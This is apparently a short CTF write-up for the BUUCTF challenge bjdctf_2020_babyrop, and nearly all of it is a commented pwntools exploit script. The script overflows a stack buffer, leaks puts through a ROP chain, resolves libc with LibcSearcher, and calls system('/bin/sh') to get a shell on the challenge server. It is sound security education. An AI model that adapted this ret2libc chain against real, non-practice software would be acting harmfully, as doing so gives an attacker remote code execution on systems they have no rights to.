
pwn | bjdctf_2020_babyrop

x64 ret2libc
常规题
注意调用约定即可

exp:

from pwn import *
from LibcSearcher.LibcSearcher import *

import struct
context.log_level = 'debug'  # pwntools: echo every send/recv; handy while checking offsets

elf = ELF('./bjdctf_2020_babyrop')  # parse the challenge binary to read its PLT/GOT entries

p_plt_puts = elf.plt['puts']   # call target: puts@plt
p_got_puts = elf.got['puts']   # leak the addr of puts(): the GOT slot holding its resolved libc address
# Hard-coded, binary-specific addresses. The fixed 0x400xxx range suggests a non-PIE
# binary — presumably; confirm with checksec before reusing against another build.
p_main = 0x00000000004006AD
# "pop rdi; ret" gadget: loads the first argument per the SysV x64 calling convention.
p_poprdi_ret = 0x0000000000400733 


# p = process('./bjdctf_2020_babyrop')   # local run; swap in for the remote line below
p = remote('node4.buuoj.cn', 25974)     # challenge instance used by this writeup


# NOTE(review): a str pattern works in pwntools but raises a BytesWarning under python3;
# b'story!\n' is the clean form (same for the two recvuntil calls below).
p.recvuntil('story!\n')

# Stage 1 (leak): filler up to the saved return address (presumably a 0x20-byte buffer
# plus the 8-byte saved rbp), then: pop rdi; ret  ->  rdi = GOT(puts)  ->  puts@plt prints
# the slot's contents  ->  return into main so the program reads a second payload.
payload = b'A' * (0x20+8) + p64(p_poprdi_ret) + p64(p_got_puts) + p64(p_plt_puts) + p64(p_main)

p.sendline(payload)

# recv addr of puts: one line, trailing newline dropped. puts() stops at the first NUL
# byte, so the leaked address arrives as fewer than 8 bytes.
_tmp = p.recvuntil('\n')[:-1]
print(_tmp)
# Right-pad with NULs and decode as little-endian u64 (equivalent to pwntools' u64()).
p_libc_puts = struct.unpack('<Q', _tmp.ljust(8, b'\x00'))[0]
print(hex(p_libc_puts))

# Identify the remote libc from the leaked puts address; dump() returns offsets inside that
# libc, hence base = leak - offset(puts). LibcSearcher may prompt interactively when several
# libc builds match the low bits of the leak.
libc = LibcSearcher('puts', p_libc_puts)
p_libc_base = p_libc_puts - libc.dump('puts')
p_libc_binsh = p_libc_base + libc.dump('str_bin_sh')
p_libc_system = p_libc_base + libc.dump('system')

# main() runs again after the first chain returned into it; consume its banner.
p.recvuntil('story!\n')

# Stage 2: same overflow, this time rdi = address of "/bin/sh" and return into system().
payload = b'A' * (0x20+8) + p64(p_poprdi_ret) + p64(p_libc_binsh) + p64(p_libc_system)
p.sendline(payload)


p.interactive()  # hand the connection over to the terminal
